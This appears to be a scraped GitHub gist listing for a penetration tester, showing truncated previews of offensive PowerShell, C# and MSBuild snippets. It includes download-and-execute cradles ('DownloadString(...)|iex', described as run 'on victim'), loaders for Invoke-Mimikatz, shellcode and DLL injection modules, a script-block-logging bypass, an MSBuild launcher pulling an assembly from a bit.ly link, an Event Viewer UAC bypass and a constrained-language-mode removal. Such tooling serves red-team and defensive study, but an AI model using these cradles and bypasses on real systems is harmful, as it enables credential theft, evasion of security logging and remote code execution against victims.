I hereby claim:
- I am davehardy20 on github.
- I am davehardy20 (https://keybase.io/davehardy20) on keybase.
- I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo
To claim this, I am signing this object:
Dave Hardy davehardy20
davehardy20
/ powertools-downloader.ps1
Last active
August 29, 2015 14:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Remove-Module PowerView -ErrorAction SilentlyContinue | |
| Remove-Module PowerUp -ErrorAction SilentlyContinue | |
| $webclient = New-Object System.Net.WebClient | |
| $url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip" | |
| $file = "$($env:TEMP)\PowerTools.zip" | |
| $webclient.DownloadFile($url,$file) | |
| #Unblock-File -Path $file | |
| $targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules" | |
| New-Item -ItemType Directory -Force -Path $targetondisk | out-null | |
| $shell_app=new-object -com shell.application |
davehardy20
/ powersploit-downloader.ps1
Last active
August 29, 2015 14:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Remove-Module PowerSploit -ErrorAction SilentlyContinue | |
| $webclient = New-Object System.Net.WebClient | |
| $url = "https://github.com/mattifestation/PowerSploit/archive/master.zip" | |
| $file = "$($env:TEMP)\PowerSploit.zip" | |
| $webclient.DownloadFile($url,$file) | |
| #Unblock-File -Path $file | |
| $targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules" | |
| New-Item -ItemType Directory -Force -Path $targetondisk | out-null | |
| $shell_app=new-object -com shell.application | |
| $zip_file = $shell_app.namespace($file) |
davehardy20
/ in-memory-downloader.ps1
Last active
July 16, 2018 22:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Most Useful PowerSploit and PowerTools Modules that can be loaded into memory | |
| # Use this line in PowerShell on victim to pull into memory the modules | |
| #(New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/davehardy20/a81fb1eaabf2512fce88/raw/0d92460eb8d43183d2ce42e3e7cfa367740426b6/in-memory-downloader.ps1")|iex | |
| $downloadcradle = New-Object Net.WebClient | |
| $modules = @( | |
| "https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/VolumeShadowCopyTools. |
davehardy20
/ bypass.xml
Last active
July 6, 2017 14:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <command> | |
| <![CDATA[ | |
| function Invoke-WMIObfuscatedPSCommand | |
| function invoke-bypass | |
| { | |
| $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) | |
| $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 |
davehardy20
/ msbuilder.xml
Created
July 27, 2017 07:19
MSBuild Execute Assembly From Environment Variable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
davehardy20
/ EventVwrBypass.cs
Created
July 27, 2017 07:21
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
davehardy20
/ PoCPowerShellCoreShellcodeRunner.ps1
Created
July 27, 2017 07:24
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| #> | |
| function Invoke-VirtualAlloc { | |
| Param ( | |
| [IntPtr] $lpAddress, | |
| [UInt32] $dwSize, | |
| [UInt32] $flAllocationType, |
davehardy20
/ Remove-ConstrainedLanguageMode.psm1
Last active
July 27, 2017 08:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |
OlderNewer